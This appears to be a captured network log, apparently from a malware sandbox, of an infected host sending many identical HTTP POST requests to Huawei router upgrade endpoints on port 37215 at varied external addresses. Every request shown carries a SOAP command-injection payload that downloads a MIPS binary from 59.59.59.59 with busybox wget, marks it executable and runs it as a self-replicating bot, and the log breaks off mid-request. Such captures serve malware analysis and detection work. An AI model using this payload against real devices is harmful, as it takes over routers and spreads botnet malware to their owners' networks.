                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          423192.168.2.1545116157.56.86.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573033094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          424192.168.2.1537094197.178.147.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573059082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          425192.168.2.155641241.7.83.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573107958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          426192.168.2.154913641.184.15.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573402882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          427192.168.2.155944841.185.168.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573529005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          428192.168.2.154817641.215.65.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573621988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          429192.168.2.15337681.158.92.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.573704958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          430192.168.2.1550264157.79.136.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574142933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          431192.168.2.1545514157.86.73.4337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574181080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          432192.168.2.1534874157.150.206.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.574424982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 